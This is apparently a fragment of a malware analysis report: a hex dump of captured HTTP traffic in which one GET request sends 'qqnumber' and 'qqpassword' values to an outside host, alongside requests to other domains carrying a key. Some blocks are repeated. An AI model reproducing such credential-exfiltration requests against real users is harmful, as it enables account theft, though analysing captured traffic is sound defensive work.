0x00000100 (00256)   416c6976 650d0a0d 0a2e302e 35303732   Alive.....0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2036 310d0a43 61636865   ength: 61..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d5276 30797a68 3363746f   o&key=Rv0yzh3cto
0x000001a0 (00416)   64413645 69387744 37304237 75526f74   dA6Ei8wD70B7uRot
0x000001b0 (00432)   3536334d 534e5342 69445148 43345443   563MSNSBiDQHC4TC
0x000001c0 (00448)   536b3473 34634935 766d6f61 69387076   Sk4s4cI5vmoai8pv
0x000001d0 (00464)   684c454e 3647734a 657977              hLEN6GsJeyw

0x00000000 (00000)   47455420 2f78696e 332f6d61 696c2e61   GET /xin3/mail.a
0x00000010 (00016)   73703f71 716e756d 6265723d 25323064   sp?qqnumber=%20d
0x00000020 (00032)   69616e78 696e7a68 656e2671 71706173   ianxinzhen&qqpas
0x00000030 (00048)   73776f72 643d2532 30253230 36204854   sword=%20%206 HT
0x00000040 (00064)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 5631290d 0a486f73   T 5.1; SV1)..Hos
0x00000090 (00144)   743a2077 77772e31 31346c61 782e636f   t: www.114lax.co
0x000000a0 (00160)   6d0d0a43 61636865 2d436f6e 74726f6c   m..Cache-Control
0x000000b0 (00176)   3a206e6f 2d636163 68650d0a 0d0a4e45   : no-cache....NE
0x000000c0 (00192)   5420434c 5220322e 302e3530 37323729   T CLR 2.0.50727)
0x000000d0 (00208)   0d0a486f 73743a20 6a696665 6e646f77   ..Host: jifendow
0x000000e0 (00224)   6e6c6f61 642e3233 34352e63 6e0d0a43   nload.2345.cn..C
0x000000f0 (00240)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x00000100 (00256)   416c6976 650d0a0d 0a2e302e 35303732   Alive.....0.5072
0x00000110 (00272)   373b202e 4e455420 434c5220 332e302e   7; .NET CLR 3.0.
0x00000120 (00288)   30343530 362e3634 383b202e 4e455420   04506.648; .NET 
0x00000130 (00304)   434c5220 332e352e 32313032 32290d0a   CLR 3.5.21022)..
0x00000140 (00320)   486f7374 3a206b61 6e626f78 73686172   Host: kanboxshar
0x00000150 (00336)   652e636f 6d0d0a43 6f6e7465 6e742d4c   e.com..Content-L
0x00000160 (00352)   656e6774 683a2036 310d0a43 61636865   ength: 61..Cache
0x00000170 (00368)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000180 (00384)   68650d0a 0d0a6163 743d6765 74696e66   he....act=getinf
0x00000190 (00400)   6f266b65 793d5276 30797a68 3363746f   o&key=Rv0yzh3cto
0x000001a0 (00416)   64413645 69387744 37304237 75526f74   dA6Ei8wD70B7uRot
0x000001b0 (00432)   3536334d 534e5342 69445148 43345443   563MSNSBiDQHC4TC
0x000001c0 (00448)   536b3473 34634935 766d6f61 69387076   Sk4s4cI5vmoai8pv
0x000001d0 (00464)   684c454e 3647734a 657977              hLEN6GsJeyw


Strings